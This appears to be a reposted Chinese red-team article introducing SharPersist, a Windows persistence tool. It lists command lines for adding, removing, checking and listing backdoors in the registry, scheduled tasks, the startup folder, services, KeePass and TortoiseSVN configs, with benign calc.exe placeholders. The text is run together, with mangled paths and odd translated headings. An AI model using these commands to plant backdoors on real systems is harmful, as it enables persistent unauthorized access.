sharPersist 是一款用于windows 系统权限维持的工具,支持部署注册表、任务计划、启动文件夹、window 服务等后门进行权限维持。还可以用于应急响应,对各种后门进行排查,删除。
使用示例
添加持久性触发器(Add)凯通SharPersist -t keepass -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -f "C:UsersusernameAppDataRoamingKeePassKeePass.config.xml" -m add 登记处SharPersist -t reg -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m addSharPersist -t reg -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add -o envSharPersist -t reg -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -k "logonscript" -m add计划任务后门SharPersist -t schtaskbackdoor -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add启动文件夹SharPersist -t startupfolder -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -f "Some File" -m add乌龟SVNSharPersist -t tortoisesvn -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -m add视窗服务SharPersist -t service -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -n "Some Service" -m add计划任务SharPersist -t schtask -c "C:WindowsSystem32cmd.exe" -a "/c echo 123 >> c:123.txt" -n "Some Task" -m addSharPersist -t schtask -c "C:WindowsSystem32cmd.exe" -a "/c echo 123 >> c:123.txt" -n "Some Task" -m add -o hourly
删除持久性触发器(删除)凯通SharPersist -t keepass -f "C:UsersusernameAppDataRoamingKeePassKeePass.config.xml" -m remove登记处SharPersist -t reg -k "hkcurun" -v "Test Stuff" -m removeSharPersist -t reg -k "hkcurun" -v "Test Stuff" -m remove -o envSharPersist -t reg -k "logonscript" -m remove计划任务后门SharPersist -t schtaskbackdoor -n "Something Cool" -m remove启动文件夹SharPersist -t startupfolder -f "Some File" -m remove乌龟SVNSharPersist -t tortoisesvn -m remove视窗服务SharPersist -t service -n "Some Service" -m remove计划任务SharPersist -t schtask -n "Some Task" -m remove
执行持久性触发器的试运行(检查)凯通SharPersist -t keepass -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -f "C:UsersusernameAppDataRoamingKeePassKeePass.config.xml" -m check登记处SharPersist -t reg -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m checkSharPersist -t reg -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m check -o envSharPersist -t reg -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -k "logonscript" -m check计划任务后门SharPersist -t schtaskbackdoor -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -n "Something Cool" -m check启动文件夹SharPersist -t startupfolder -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -f "Some File" -m check乌龟SVNSharPersist -t tortoisesvn -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -m check视窗服务SharPersist -t service -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -n "Some Service" -m check计划任务SharPersist -t schtask -c "C:WindowsSystem32cmd.exe" -a "/c echo 123 >> c:123.txt" -n "Some Task" -m checkSharPersist -t schtask -c "C:WindowsSystem32cmd.exe" -a "/c echo 123 >> c:123.txt" -n "Some Task" -m check -o hourly
列出持久性触发器条目(List)登记处SharPersist -t reg -k "hkcurun" -m list计划任务后门SharPersist -t schtaskbackdoor -m listSharPersist -t schtaskbackdoor -m list -n "Some Task"SharPersist -t schtaskbackdoor -m list -o logon启动文件夹SharPersist -t startupfolder -m list视窗服务SharPersist -t service -m listSharPersist -t service -m list -n "Some Service"计划任务SharPersist -t schtask -m listSharPersist -t schtask -m list -n "Some Task"SharPersist -t schtask -m list -o logo
原文始发于微信公众号(贝雷帽SEC):【红队】一款用于windows 系统权限维持的工具
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论